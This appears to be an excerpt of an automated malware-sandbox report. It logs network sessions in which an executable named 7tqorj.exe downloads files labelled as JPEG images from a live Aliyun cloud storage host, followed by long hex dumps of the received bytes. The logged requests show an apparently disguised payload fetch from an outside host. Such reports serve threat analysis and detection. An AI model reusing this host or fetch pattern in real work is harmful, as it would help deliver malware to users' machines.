18 b0 aa 39 1f 25 1a a3 fc d2 ed 9d d9
                                                  Data Ascii: kNf@Ej<b@23_+ic"4xe$~X]1WK>e/e{m;|~m?WW_)k4'5;f!"E3C-.I?4b7^+/d?>?@C%C#lMQNgW<6^Q7{cu[yD3`x#9%
                                                  2025-01-06 03:51:22 UTC4096INData Raw: 2c 4d a6 a0 20 85 bf 62 23 7d 82 17 a5 30 de 99 08 fd bd 71 3f 39 61 73 43 04 d3 d0 32 6b df ec 1f f3 aa 3d 7b 0a ac d4 c6 23 eb ed fa 6d 34 b5 ed 0c e2 bd 2c ed e9 83 bc 4d 87 be 3e 5f 02 ba 42 ba da 19 39 86 8b 76 98 c3 52 60 65 25 e5 a0 40 e2 e2 87 c6 57 a0 12 c5 86 50 1e d8 82 61 b1 e8 7b 70 85 f2 3b b7 dd 68 1e f0 82 30 32 37 c7 33 54 06 4a a4 ff 6e be 09 90 75 b8 64 7a 3e 21 db ce 6f 5c 64 44 b9 59 00 93 ff 91 7d e8 f9 20 94 90 60 c8 6f 44 97 f9 8e b9 3f 4e a3 4f 16 b9 47 f2 81 03 6a 69 e2 21 55 c2 e5 97 52 04 26 ef ae c8 f0 44 77 88 66 31 a0 58 9d 00 de 3e a6 b9 c8 84 84 87 db 90 d9 4b f7 1b 42 d5 22 bd 5d b8 39 1d f5 0a 38 c0 d7 f6 11 bc a9 e2 0c 57 c6 d6 d2 a9 8d 6a 24 3b 74 4e 4b d1 a2 f8 51 7c c5 b8 66 61 13 6e 3f 61 be 64 71 7e 98 bf 08 7c a7
                                                  Data Ascii: ,M b#}0q?9asC2k={#m4,M>_B9vR`e%@WPa{p;h0273TJnudz>!o\dDY} `oD?NOGji!UR&Dwf1X>KB"]98Wj$;tNKQ|fan?adq~|
                                                  2025-01-06 03:51:22 UTC4096INData Raw: 94 13 4b ba 59 94 28 79 a8 e0 04 9d d9 34 71 d1 8c 52 64 54 a0 2b 3c 9c 31 d6 31 5f dd b0 e1 72 5d e3 d3 0b c9 a4 8c fb 2c 74 4a 06 21 9f e8 77 ac 0e 7a 81 04 97 79 d9 a7 dd 40 e7 17 4f ab a4 75 32 04 32 e1 14 a8 64 5f 11 ea c6 56 50 d4 0e a9 a2 60 f3 93 c9 f3 5b a6 1a 47 9d 93 21 ea 45 f3 4d b6 6f fb a9 28 33 1d 5a 7f 16 47 e8 cf ef 81 45 43 18 41 ba 88 08 34 0b 76 70 e2 cb ca 69 b2 1e ec 31 ce 87 99 c8 ea 75 26 3c 60 26 76 99 85 6f 63 0e 0a a5 9a c7 af 0b ca ae 36 08 d2 74 3d 9c 9f c4 1f ad bf b0 84 3c 40 df 89 dd 19 5a d3 d7 79 ab d7 2e 2a a0 76 2f e6 75 8b 65 39 ad 89 15 b0 7f fa 18 c5 c7 ac b2 d7 44 6c f2 c9 cc af e9 40 b3 57 30 a5 f3 1f f5 06 cf 73 14 18 f9 0d 72 f7 19 79 98 57 e5 11 81 1a 41 9d 8f a7 7d ea 03 5c 14 65 f8 a6 73 dd d4 70 b3 48 cb 66
                                                  Data Ascii: KY(y4qRdT+<11_r],tJ!wzy@Ou22d_VP`[G!EMo(3ZGECA4vpi1u&<`&voc6t=<@Zy.*v/ue9Dl@W0sryWA}\espHf
                                                  2025-01-06 03:51:22 UTC4096INData Raw: 7e 30 df f0 37 2c a5 37 4f 4c e2 13 7c d1 f8 91 c5 fa be cf 9e 00 28 6a dd ff a3 dc ca c7 5f af 65 39 20 43 0f 76 27 75 a7 a8 f1 fa 94 9f e4 b0 f7 a8 82 87 3b 0a 53 b7 20 93 c5 42 21 59 4a 44 cf 6d 00 01 ce a2 49 10 81 c0 c4 c2 ee b6 e5 6b df 46 07 d3 21 07 58 b3 27 fb fe f2 08 3e bc 0d 03 78 9c 6a b4 0f 93 15 14 83 ae 77 c8 e3 dc db 3a e9 9b 9d 1c c6 8a 7b 52 97 8e 19 85 b7 fb c2 a6 6b fd 94 63 78 f1 63 13 10 63 6f 18 d5 92 b6 d1 b7 a2 84 9b d4 90 d9 84 fc ef a5 a6 c5 ba b6 64 c7 fe d4 d4 23 c0 71 8e e4 e7 87 ee e0 7b 41 ab 03 0e d0 58 f4 61 98 ac 8a bc 7f 9b 4c 5a 39 6c 26 9a c8 d3 6c b4 71 fa 5a e7 33 7a 60 25 a6 5a 83 a7 05 e0 89 ab f3 71 7b 1f 34 10 5a c9 8f 29 a8 53 58 fe 56 32 96 b8 9e 3a d9 ee 0c 60 09 71 b5 2b 70 55 a8 b7 e2 8b 6b 95 ad 89 2f ca
                                                  Data Ascii: ~07,7OL|(j_e9 Cv'u;S B!YJDmIkF!X'>xjw:{Rkcxccod#q{AXaLZ9l&lqZ3z`%Zq{4Z)SXV2:`q+pUk/
                                                  2025-01-06 03:51:22 UTC4096INData Raw: e7 04 8e cb 30 d6 37 73 19 58 f3 d5 05 6a d7 87 a6 a4 b9 8e a3 5d cc d5 8b 34 ca e2 6a a0 78 0e e3 7b 1c 29 5a a6 5b 55 62 f1 e6 be 23 a0 43 ad e5 d7 92 f7 b3 96 4f 03 54 71 e0 f1 af 06 a6 f0 00 d1 7e 0a b5 f4 09 e0 28 9e fb 47 84 32 32 1b 8a 9f c1 2e bc e2 8e a0 2e ff 90 dd 7e c7 83 94 f3 d0 5a 05 5e 0b 2c b3 a4 f8 4a e7 0f 49 f6 3d ff 18 c0 83 1f 5d f8 00 bd db 23 65 28 8b 33 a9 4d 2b 81 26 66 9c dc 18 b6 96 f5 c0 bf 49 34 bb da 49 5e 06 d6 0f 1c e9 ba c4 8c 4c bb 0d 49 a4 6a fd d0 ef 7e 6b 35 34 10 92 02 52 67 16 58 07 e6 47 e0 dc bb dc 14 5e a1 d9 f0 67 70 2c ed fa 8f ca 33 6f ad 4f 2b e0 78 1e f0 18 a4 c5 e4 02 81 a3 0f 9f 0e 1b 45 92 27 fc 39 cc be 57 c0 4c f8 c9 c4 77 47 d4 ac 33 24 78 3d f0 d1 e4 b8 d2 ce 88 69 21 65 3a 2c 1f 95 b1 20 31 6f 2a 06
                                                  Data Ascii: 07sXj]4jx{)Z[Ub#COTq~(G22..~Z^,JI=]#e(3M+&fI4I^LIj~k54RgXG^gp,3oO+xE'9WLwG3$x=i!e:, 1o*
                                                  2025-01-06 03:51:22 UTC4096INData Raw: be d0 2a 4c 19 64 3b ba 0e 94 4e 20 15 9f c2 86 3a 4f 85 f3 ee 58 cd 35 91 2f 10 20 88 da 3e c0 05 f8 22 66 79 44 a0 a8 56 48 12 18 4c 26 67 bf 07 bd 0e 8a 4f b7 62 4f 64 7b 46 88 30 02 d0 63 3b 3d 3c 2c 8c 51 e6 c8 ad 43 c5 a4 f1 40 de 99 5c b6 f7 dc 3c 7d 03 cf d9 bc 50 d4 5c 1b dd e0 e1 e2 85 6d a9 c3 e7 80 7d cd 51 5d 8b 19 fb d4 7c 96 d7 f0 1c 7d 23 ef f9 3d bf d8 fd 3e b9 23 40 ea b3 f0 27 06 c6 ea 0b 81 ce 0f cf e6 d6 16 19 12 9a 03 7d 2b 37 16 c5 97 7f 38 15 f7 a1 1d 02 22 4b 1f a3 92 9d c1 35 82 21 2c 90 85 a7 9e 04 28 f5 b1 d9 e8 96 b1 29 17 fc ee 8c bf c7 80 28 0e ea b1 fb 7e 34 d7 f3 21 35 2f 26 43 09 73 42 b5 c9 ae 73 45 1e 38 5f c7 ea 8b e0 a7 ba f0 52 79 4f c7 e5 a4 8b dd 4b 28 03 3d a1 25 9f ac b6 97 e3 25 09 20 15 2d d1 f6 c6 3d 63 88 5a
                                                  Data Ascii: *Ld;N :OX5/ >"fyDVHL&gObOd{F0c;=<,QC@\<}P\m}Q]|}#=>#@'}+78"K5!,()(~4!5/&CsBsE8_RyOK(=%% -=cZ


                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                  11192.168.2.649997118.178.60.94433476C:\Users\user\Documents\7tqorj.exe
                                                  TimestampBytes transferredDirectionData
                                                  2025-01-06 03:51:34 UTC115OUTGET /FOM-52.jpg HTTP/1.1
                                                  User-Agent: GetData
                                                  Host: 22mm.oss-cn-hangzhou.aliyuncs.com
                                                  Cache-Control: no-cache
                                                  2025-01-06 03:51:34 UTC547INHTTP/1.1 200 OK
                                                  Server: AliyunOSS
                                                  Date: Mon, 06 Jan 2025 03:51:34 GMT
                                                  Content-Type: image/jpeg
                                                  Content-Length: 5062442
                                                  Connection: close
                                                  x-oss-request-id: 677B5346F947FB3734CEDE47
                                                  Accept-Ranges: bytes
                                                  ETag: "70C21DA900796B279A09040B00953E40"
                                                  Last-Modified: Mon, 18 Nov 2024 15:32:22 GMT
                                                  x-oss-object-type: Normal
                                                  x-oss-hash-crc64ecma: 360383310743409046
                                                  x-oss-storage-class: Standard
                                                  x-oss-ec: 0048-00000105
                                                  Content-Disposition: attachment
                                                  x-oss-force-download: true
                                                  Content-MD5: cMIdqQB5ayeaCQQLAJU+QA==
                                                  x-oss-server-time: 14
                                                  2025-01-06 03:51:34 UTC3549INData Raw: 89 50 4e 47 0d 0a 1a 0a 00 00 00 0d 49 48 44 52 00 00 02 00 00 00 02 00 08 03 00 00 00 c3 a6 24 c8 00 00 01 da 50 4c 54 45 00 00 00 f7 cd 48 f0 d2 4b f5 cd 46 0f a5 f0 f7 ce 47 f7 cd 48 f7 cc 47 f7 cd 48 f7 cd 48 f5 cd 44 f6 ce 49 f6 cd 47 f6 cd 47 66 c9 46 66 c9 48 66 c9 46 66 ca 45 f6 cd 48 f6 cc 48 f7 cc 48 f6 cc 48 f6 cd 48 0f a0 eb 12 a2 ea f8 cd 48 11 a2 e9 10 a1 e9 f7 cd 48 f6 cd 47 10 a2 ea 11 a1 ea f6 cd 47 11 a2 eb 10 a1 ea 12 a1 e8 0f a5 e8 10 a2 ea 11 a2 e9 f6 cc 47 ff da 48 11 a1 e9 11 a2 e9 00 99 ff 11 a1 e9 10 a2 ea 11 a1 e9 10 a3 ea 11 a1 e9 00 bf ff 00 aa ff 11 a2 e9 00 91 da 11 a0 e7 10 a2 ea 10 a1 e9 10 a2 eb 11 a1 e9 11 a2 ea 11 a1 e9 10 a2 e9 0f 9f ef 10 a2 e9 10 a2 ea 13 a6 eb 10 a1 ea 10 a1 e9 1f 9f df 11 a1 e9 11 a4 e8 10 a1 e9 10
                                                  Data Ascii: PNGIHDR$PLTEHKFGHGHHDIGGfFfHfFfEHHHHHHHGGGH
                                                  2025-01-06 03:51:34 UTC4096INData Raw: 76 3b 9a 2f a5 d0 56 ab c4 f4 cc a1 12 27 f0 11 4c 94 ef 12 31 58 23 3c c6 b1 ec ba 45 96 46 46 f6 24 8e 89 dd b1 38 89 66 c2 79 d2 b3 b5 25 19 80 c7 28 f9 85 7d 8d 49 94 e3 d2 8b 92 cb f1 27 a5 1e 65 9a 0d 24 21 88 82 f8 05 e3 7e 27 2d b8 d1 e3 32 71 8d ad 95 6c 46 1c 3b d8 e9 eb 13 24 94 d8 16 f1 f4 38 83 ee f5 d4 be 1d b9 53 fa 70 d4 ee cc a4 15 79 67 9f 06 cb 07 19 b1 3e 7c b5 65 18 68 0a c6 22 13 ed 4c ea 2c ff 32 4f 94 a2 b5 94 ef ee d9 86 62 ff a7 83 cf f0 ea c9 44 53 4d 8a 6c 9b cc 06 f2 e6 13 fa 3c 21 8d f7 9f 32 cd 95 50 9a 71 01 f0 c6 0b dd 04 f0 5b 24 6b c6 6c 7f 35 67 68 4a 5b 2d df 32 af ed a0 7b 95 d7 43 07 d1 fb 17 0b 43 df 87 62 69 46 68 e0 eb 47 28 a3 81 aa 32 08 bc 21 f8 7a 14 93 1b c6 2c 1b 7d c3 10 5b d1 12 f7 56 c2 1c 7c e4 85 f3 c4
                                                  Data Ascii: v;/V'L1X#<EFF$8fy%(}I'e$!~'-2qlF;$8Spyg>|eh"L,2ObDSMl<!2Pq[$kl5ghJ[-2{CCbiFhG(2!z,}[V|
                                                  2025-01-06 03:51:34 UTC4096INData Raw: 77 a8 c4 d9 fd a7 56 28 73 5f 0f 7f 3b 00 66 82 36 d4 2f 7b 1c 50 0d 90 42 5e 0e b6 3d dc 83 58 6a 35 e0 f2 6f 3a a8 d5 ee 37 cd 99 ee 9c 06 8c d0 87 05 97 4d 50 36 97 03 25 ea e1 52 3c bb 3e 25 ca 4d a1 9a de 65 27 6e 38 2d 65 92 e5 96 84 ff 4a 69 e4 8b 0a 8b 94 f6 d4 7c 01 80 fb e0 03 ea 19 32 5d 29 28 3c ad 5d b5 fc 74 7f 9a bf fa 5f aa b3 08 b5 0d 57 25 c0 b8 67 cb 8c bc e8 48 4a 02 a5 57 78 65 40 ad c1 5a 91 f1 85 ed 06 07 63 d1 27 0a 48 fc b3 b0 df 6f a6 ee 6a 10 26 82 2e 2b 90 38 ca 76 a6 a6 73 fc a4 31 18 8b bd 07 98 fc 6b e9 ca cc 83 78 6a 94 92 3f 5d 02 57 0e 0c a9 36 a3 64 c6 b8 98 a5 03 28 be 9c a1 91 80 1b b7 e8 6f 73 1a dc 78 f5 54 c0 09 e3 53 1a 57 f1 88 1f f9 f7 41 dd c4 eb 74 19 ad 09 5d 4b c5 25 7f a9 10 ba 2e 1a 5c 79 23 15 00 2d cb 6f
                                                  Data Ascii: wV(s_;f6/{PB^=Xj5o:7MP6%R<>%Me'n8-eJi|2])(<]t_W%gHJWxe@Zc'Hoj&.+8vs1kxj?]W6d(osxTSWAt]K%.\y#-o
                                                  2025-01-06 03:51:34 UTC4096INData Raw: f5 f5 f3 fb ff fd f3 f5 f7 f5 f3 eb ef ed d3 d5 d7 d5 d3 dd bf a7 d3 d5 d3 d5 d3 2d 2f 2d 33 37 37 75 32 3d 3f 2d 33 35 27 35 33 2d 2f 3d 53 55 47 55 53 5d 5f 5d 53 45 57 55 53 11 b2 50 73 3f 77 75 73 f1 8d 4d 73 a9 77 75 73 6d 3f 17 53 b5 56 55 53 5d 5f 5d 53 55 57 55 53 2d 2f 2d 33 35 37 35 33 3d 0f 47 33 15 2c 35 33 2d 2f 2d d3 d5 d7 d5 d3 dd df dd d3 d5 d7 d5 d3 ed ef ed f3 f5 f7 f5 f3 fd ff fd f3 f5 f7 f5 f3 4d c9 97 d3 95 d7 d5 d3 dd df dd d3 d5 d7 d5 d3 2d 1f 00 33 51 37 35 33 3d 3f 3d 33 35 37 35 33 2d 2f 2d 53 55 57 55 53 5d 5f 5d 53 55 57 55 53 43 1b 08 0b 01 77 75 73 1e cd 7c 73 75 67 75 73 6d 6f 6d 53 55 57 55 53 5d 5f 5d 53 55 57 55 53 2d 2f 2d 33 15 37 35 53 13 4d 59 52 41 56 35 33 e5 a6 2d d3 d5 07 d4 d3 dd df dd d3 d5 d7 d5 d3 ed ef ed f3
                                                  Data Ascii: -/-377u2=?-35'53-/=SUGUS]_]SEWUSPs?wusMswusm?SVUS]_]SUWUS-/-35753=G3,53-/-M-3Q753=?=35753-/-SUWUS]_]SUWUSCwus|sugusmomSUWUS]_]SUWUS-/-375SMYRAV53-
                                                  2025-01-06 03:51:34 UTC4096INData Raw: d1 7d e2 3a fb d9 7f 2d 5c 08 7e 89 cb e9 3a 78 19 d3 d3 54 a8 dd 3b c0 68 9c d3 da f6 a0 3f b8 09 85 13 9c b2 89 02 f5 bb 84 84 22 99 a1 5c eb db e4 e4 52 d7 a8 84 57 57 3d d3 53 dd 2c 15 fe 48 f8 17 59 7b 94 02 a5 74 75 f2 ab 6b 6d 53 55 5c 97 a4 8d b7 85 fd 1e 57 33 82 c4 fc f5 5b b3 98 02 7d b4 7b 18 33 b8 53 11 3f c4 e7 e4 99 d5 df 7a 12 6b f1 4b ab 5b 8f 5c 2e 0b c5 75 fb 0d d3 04 7a 6d a5 1d 7f b1 af 41 46 fd 97 72 44 70 9c 6c f0 98 c6 38 c7 3a 4f 9d 67 53 5d 8b 18 45 fa 27 78 f9 2c e7 bf e3 1a 15 03 e6 d9 54 24 d6 03 bf c8 c3 24 e4 ff 0d e1 62 93 bb 32 d3 1d e0 a9 69 56 22 dc 79 04 9f f6 79 91 f4 ce a4 27 3e 2c 7c 5a 6b f3 21 34 52 4f 12 6e 97 99 0b 32 20 48 ad 50 69 a7 06 6a 8b 46 53 7e 44 e7 8d 63 9d 43 d3 36 f2 39 ef 4b 76 db 20 c3 a9 cd f4 6d
                                                  Data Ascii: }:-\~:xT;h?"\RWW=S,HY{tukmSU\W3[}{3S?zkK[\.uzmAFrDpl8:OgS]E'x,T$$b2iV"yy'>,|Zk!4ROn2 HPijFS~DcC69Kv m
                                                  2025-01-06 03:51:34 UTC4096INData Raw: 5c f2 f3 f2 cb a8 4e 59 1d d2 ce 66 43 81 7b ff 67 50 14 99 fb dd 4e 2d 27 1b 3b 32 e1 3d 33 3a 03 dd 71 52 2f 3d b3 f7 09 f2 37 09 35 05 d2 00 d7 a7 6e a2 5b 79 ad 9f 96 b5 c6 ed 9d 66 b3 39 53 74 34 ad bd bc 93 b3 fe 71 77 93 a5 84 18 86 55 55 ba d3 80 5c 53 d8 33 71 4b ee a2 49 17 31 de 70 f5 2e 3f d4 1a 6a 27 35 da f8 c9 29 d3 3d 14 a5 d5 dd 18 d9 f7 74 d2 59 bd 8b 6e 18 e6 02 30 b1 d7 f9 6b fa e2 61 91 0a 36 8b dc 30 3b 0f bb de d3 87 8c 44 53 a3 22 0d aa a3 e3 13 d4 68 4b 97 1e 19 a2 5f ef 4f 5c 9c 5f 83 e2 ed 0e 6b 27 d3 18 e0 1f 57 f6 99 4e 8f 66 e4 e9 d6 c4 39 a5 10 98 95 71 d9 7b bc 71 9c 9c 89 c1 9c 58 3a b4 2b 66 f8 3c 84 df 79 ba 43 96 ad af 4f c6 9e 70 72 72 50 0a 98 50 ac 17 9d c0 f8 94 89 96 25 87 df 01 09 25 05 6d 3f 30 e0 76 8e 06 07 6c
                                                  Data Ascii: \NYfC{gPN-';2=3:qR/=75n[yf9St4qwUU\S3qKI1p.?j'5)=tYn0ka60;DS"hK_O\_k'WNf9q{qX:+f<yCOprrPP%%m?0vl
                                                  2025-01-06 03:51:34 UTC4096INData Raw: 20 fb 64 56 1a 91 6e df 20 2c 89 77 e2 e2 05 39 f2 8e f5 00 2d 52 de 02 01 04 ca 1a ce 6a d2 47 a1 f6 d0 fe 59 5f 7b be ab de 7e b5 7b 3a bc 5c 60 b4 14 c4 40 8e 4f 1b d3 50 30 ca 88 05 19 87 a6 6c 44 9c 38 ec 39 0e 59 7b 02 e0 f1 72 5e f5 ad 67 1a cd 99 59 ab ba 5e 62 b2 6a a6 96 6c 3f b0 7f 47 31 af f9 8d b1 e6 2c 04 cc 68 ac 20 ea 27 da fc 3a c9 29 c2 2d 03 bc 6d b2 50 da 12 b2 4e b6 81 da 21 4d f8 86 bb 30 9c c3 3a 42 00 c7 75 98 22 d5 e2 ed f7 ca c4 d5 09 a4 4e 82 04 d4 70 9c 5e b4 e3 6c a8 46 17 b5 25 7a 7b b5 5c 61 52 62 b2 1a fe 80 42 8b a0 8b af 69 84 9a 79 9f 8b 45 e0 9d 05 e1 0c 2d e5 1f 50 b8 e2 04 38 e7 df 32 37 b0 48 b1 af 82 c3 27 a8 d2 aa e1 62 df e9 b2 a2 12 f5 be 96 d6 5d 5d 4d 27 3a 1a 32 92 06 ad 9a 5b a6 db 14 ee 80 13 e1 a7 67 c5 71
                                                  Data Ascii: dVn ,w9-RjGY_{~{:\`@OP0lD89Y{r^gY^bjl?G1,h ':)-mPN!M0:Bu"Np^lF%z{\aRbBiyE-P827H'b]]M':2[gq
                                                  2025-01-06 03:51:34 UTC4096INData Raw: 11 ac 16 c6 07 c4 9d 58 cd bb f4 f0 2b 3a 16 5a da 8a 33 81 27 42 b4 e4 1c b3 44 f3 eb 30 85 ed 13 a0 b4 46 35 68 06 83 59 2b bf 9b 83 03 97 31 12 15 bc 78 b1 76 b9 71 21 32 04 6b 81 a4 83 32 6f d6 69 98 27 df ea f9 0c 4f 4b 67 2f 4b 06 67 44 04 ef 78 60 0a 1a 43 f5 40 32 c2 0d 65 17 e5 08 cc a8 23 c1 d9 dd 70 6e 88 fc 7f 8d 81 6d 3c 8a c0 7c 8f 3d 55 13 79 ca fa 4f 7d 9f 59 1f ab 7a 58 3c b6 7e 0a 9f 2b 23 7e 6a 96 9f 38 e0 63 e5 5a 1a 32 5b b4 2a 2e c8 4b fc 30 60 d4 a2 2b 2b bb 40 ab 29 c3 47 5a c5 72 2a 67 22 60 fd 3a 2c 8c 49 94 ad 10 8c f4 1c aa 13 b2 44 63 6e 0d 2e 1c 0e 75 75 75 69 83 57 e4 6c 56 e5 7f 18 20 b8 d1 37 88 2a 1b 65 fe 57 b8 31 b5 b2 3c d8 01 d7 18 1c 20 44 7d d7 1c 11 ca 50 b1 34 77 e7 17 39 01 6f c0 e8 d3 94 88 53 e8 54 bc 80 c3 59
                                                  Data Ascii: X+:Z3'BD0F5hY+1xvq!2k2oi'OKg/KgDx`C@2e#pnm<|=UyO}YzX<~+#~j8cZ2[*.K0`++@)GZr*g"`:,IDcn.uuuiWlV 7*eW1< D}P4w9oSTY
                                                  2025-01-06 03:51:34 UTC4096INData Raw: ef cc 4c d0 d3 09 06 21 8c 0a e4 fd 58 ee 29 db 81 82 6d c1 a4 30 bc c1 88 36 cd ab 62 b5 32 ab fb fb ec 20 e3 1f be d1 52 c7 7b bf 58 54 f3 43 f2 8d 0e 8b f7 13 10 a0 bb 4f ee a1 7a 27 8f 37 90 b6 93 e7 12 94 df b3 75 98 ed 5e 3f 26 b3 6b dc e4 4b ac 06 65 59 29 76 21 46 e6 59 50 ec 8d 23 41 76 61 bd b4 2a c0 a1 d0 00 7d 85 b9 46 a9 73 14 b0 38 5b 50 8e c5 4d 41 4e b1 33 ec 52 c8 9b 60 d6 75 f5 94 ee 23 f4 6f f6 e6 d2 e9 4d 56 be d7 e4 8f 26 6e aa 79 e5 e6 5e 13 6c 17 b6 e2 e2 11 f5 fe 7e 0b 44 9b c6 aa 3a f9 70 8c 7b bc 07 41 a6 db 37 9c 40 ed 30 d4 63 08 f2 34 c3 bc 19 00 1b 0e a0 05 0a d9 18 ea e0 fd 6c 8a 5d c5 2d 44 59 87 c8 6a f8 9f 94 42 5d b7 0d 78 f1 3b 58 f0 58 03 2c 94 05 87 6d 14 59 c3 c8 52 68 6d 20 54 3c df df dd d3 b3 5e da 3a d6 ef ef f3
                                                  Data Ascii: L!X)m06b2 R{XTCOz'7u^?&kKeY)v!FYP#Ava*}Fs8[PMAN3R`u#oMV&ny^l~D:p{A7@0c4l]-DYjB]x;XX,mYRhm T<^:
                                                  2025-01-06 03:51:34 UTC4096INData Raw: 15 03 58 89 56 b4 b6 a2 ad 03 9c f1 67 d1 75 f3 e8 19 38 39 86 89 50 71 f6 9c 55 6e f0 3c 79 b6 4b a6 36 b9 b4 a2 ab 24 ae 39 77 96 dd 86 d0 fd 7d 97 cb 0d f0 c5 e3 02 f9 c1 52 24 d9 92 d5 0f ce ba 02 8d 60 9d a4 7e 46 0c f6 07 7e 6e 99 9f b7 49 61 ff 7c c2 1d c4 45 e2 10 ab 9d 5d f3 48 c7 32 f2 49 bd 7e 2c f3 14 b8 55 84 3b b6 cd f2 2c a2 4e c8 2f 6a 5f 90 af 64 33 93 34 22 de 67 0c 00 0a 07 58 6d 1d 91 a5 e8 77 57 3e 92 ad 64 db 25 db 5a a7 9e fb ee 37 1e bf 9f 1c 20 8f 58 83 8e 9c 9d 1a 84 f4 2f e8 b6 e9 fc 5c 14 cf 3d a8 20 c1 36 73 8b 6d ad fa 19 32 a5 19 e7 34 c8 51 2a b2 c7 6f 71 16 6b 1a c9 12 87 4a 5b 13 27 7e 0c 5d 42 3e 1f df 6d a6 94 82 5a 53 5e fd 07 49 a4 e3 fa f2 49 de ae 8b 50 62 d9 cf c2 ba 82 06 00 8f 34 6e 19 e8 d9 e4 90 5c e0 85 6f a3
                                                  Data Ascii: XVgu89PqUn<yK6$9w}R$`~F~nIa|E]H2I~,U;,N/j_d34"gXmwW>d%Z7 X/\= 6sm24Q*oqkJ['~]B>mZS^IIPb4n\o


                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                  12192.168.2.649998118.178.60.94433476C:\Users\user\Documents\7tqorj.exe
                                                  TimestampBytes transferredDirectionData
                                                  2025-01-06 03:51:44 UTC115OUTGET /FOM-53.jpg HTTP/1.1
                                                  User-Agent: GetData
                                                  Host: 22mm.oss-cn-hangzhou.aliyuncs.com
                                                  Cache-Control: no-cache
                                                  2025-01-06 03:51:45 UTC547INHTTP/1.1 200 OK
                                                  Server: AliyunOSS
                                                  Date: Mon, 06 Jan 2025 03:51:45 GMT
                                                  Content-Type: image/jpeg
                                                  Content-Length: 366410
                                                  Connection: close
                                                  x-oss-request-id: 677B5351E001B43633B5B969
                                                  Accept-Ranges: bytes
                                                  ETag: "DA1D5EB665D3AAD523BE59415E6449ED"
                                                  Last-Modified: Tue, 22 Oct 2024 14:47:51 GMT
                                                  x-oss-object-type: Normal
                                                  x-oss-hash-crc64ecma: 5641369857548672686
                                                  x-oss-storage-class: Standard
                                                  x-oss-ec: 0048-00000105
                                                  Content-Disposition: attachment
                                                  x-oss-force-download: true
                                                  Content-MD5: 2h1etmXTqtUjvllBXmRJ7Q==
                                                  x-oss-server-time: 43
                                                  2025-01-06 03:51:45 UTC3549INData Raw: ff d8 ff e0 00 10 4a 46 49 46 00 01 01 01 00 90 00 90 00 00 ff e1 00 5a 45 78 69 66 00 00 4d 4d 00 2a 00 00 00 08 00 05 03 01 00 05 00 00 00 01 00 00 00 4a 03 03 00 01 00 00 00 01 00 00 00 00 51 10 00 01 00 00 00 01 01 00 00 00 51 11 00 04 00 00 00 01 00 00 16 25 51 12 00 04 00 00 00 01 00 00 16 25 00 00 00 00 00 01 86 a0 00 00 b1 8f ff db 00 43 00 02 01 01 02 01 01 02 02 02 02 02 02 02 02 03 05 03 03 03 03 03 06 04 04 03 05 07 06 07 07 07 06 07 07 08 09 0b 09 08 08 0a 08 07 07 0a 0d 0a 0a 0b 0c 0c 0c 0c 07 09 0e 0f 0d 0c 0e 0b 0c 0c 0c ff db 00 43 01 02 02 02 03 03 03 06 03 03 06 0c 08 07 08 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c ff c0 00 11 08
                                                  Data Ascii: JFIFZExifMM*JQQ%Q%CC
                                                  2025-01-06 03:51:45 UTC4096INData Raw: 60 60 60 60 60 60 60 60 60 60 60 60 60 60 60 60 60 60 60 60 60 60 60 60 60 60 60 60 60 60 a0 a0 a0 a0 a0 a0 a0 a0 a0 a0 a0 a0 a0 a0 a0 a0 a0 a0 a0 a0 a0 a0 a0 a0 a0 a0 a0 a0 a0 a0 a0 a0 e0 e0 e0 e0 e0 e0 e0 e0 e0 e0 e0 e0 e0 e0 e0 e0 e0 e0 e0 e0 e0 e0 e0 e0 e0 e0 e0 e0 e0 e0 e0 e0 a0 a0 a0 a0 a0 a0 a0 a0 a0 a0 a0 a0 a0 a0 a0 a0 a0 a0 a0 a0 a0 a0 a0 a0 a0 a0 a0 a0 a0 a0 a0 a0 60 60 60 60 60 60 60 60 60 60 60 60 60 60 60 60 60 60 60 60 60 60 60 60 60 60 60 60 60 60 60 60 a0 a0 a0 a0 a0 a0 a0 a0 a0 a0 a0 a0 a0 a0 a0 a0 a0 a0 a0 a0 a0 a0 a0 a0 a0 a0 a0 a0 a0 a0 a0 a0 e0 e0 e0 e0 e0 e0 e0 e0 e0 e0 e0 e0 e0 e0 e0 e0 e0 e0 e0 e0 e0 e0 e0 e0 e0 e0 e0 e0 e0 e0 e0 e0 a0 a0 a0 a0 a0 a0 a0 a0 a0 a0 a0 a0 a0 a0 a0 a0 a0 a0 a0 a0 a0 a0 a0 a0 a0 a0 a0 a0 a0 a0 a0 a0 60
                                                  Data Ascii: ```````````````````````````````````````````````````````````````
                                                  2025-01-06 03:51:45 UTC4096INData Raw: 60 60 60 eb 25 68 30 9f 75 d0 14 62 70 e9 25 84 e3 1d 84 60 15 67 52 a0 89 a9 60 60 60 06 67 e5 4c a2 a0 c6 2b ed ac f1 5f b5 0c d4 a2 b0 c6 29 e5 4e 2b f5 44 2b e2 ac 2b a8 2b b1 29 f5 10 8a f0 6d a5 0c b0 6b ad 34 6b b1 a8 b2 1f f5 2c 94 e2 f0 63 18 1f 95 e7 d2 20 09 68 e0 e0 e0 67 e5 5c a1 a0 a0 a0 ca a4 2d e5 5c f0 ca a8 c8 5f 5f a0 a0 2b ed 74 2b f1 e8 f2 5f b5 08 d4 a2 70 e5 a0 15 59 a7 25 b8 61 60 60 60 a7 25 bc 40 df 62 60 a7 25 80 e8 73 60 60 0a 60 0a 60 ed 25 48 f0 ca a0 ca a0 ca ac 2d ed 78 f1 c8 a4 a0 a0 38 2b f5 74 2b e2 e8 f0 5f b5 00 d4 a2 b0 2b ed 34 26 a1 b3 e1 8a e0 8a e0 8a e0 6b b5 34 b2 88 69 f7 e0 f0 8a e0 8a e0 08 da 10 e0 e0 63 24 fc 2b ed 74 29 e1 e4 10 a1 2b 45 fd 62 a8 a0 f5 2b 4c 18 b8 6a a0 a0 48 9a a7 a1 a0 f6 f7 2b e5 a8 e9
                                                  Data Ascii: ```%h0ubp%`gR```gL+_)N+D+++)mk4k,c hg\-\__+t+_pY%a```%@b`%s````%H-x8+t+_+4&k4ic$+t)+Eb+LjH+
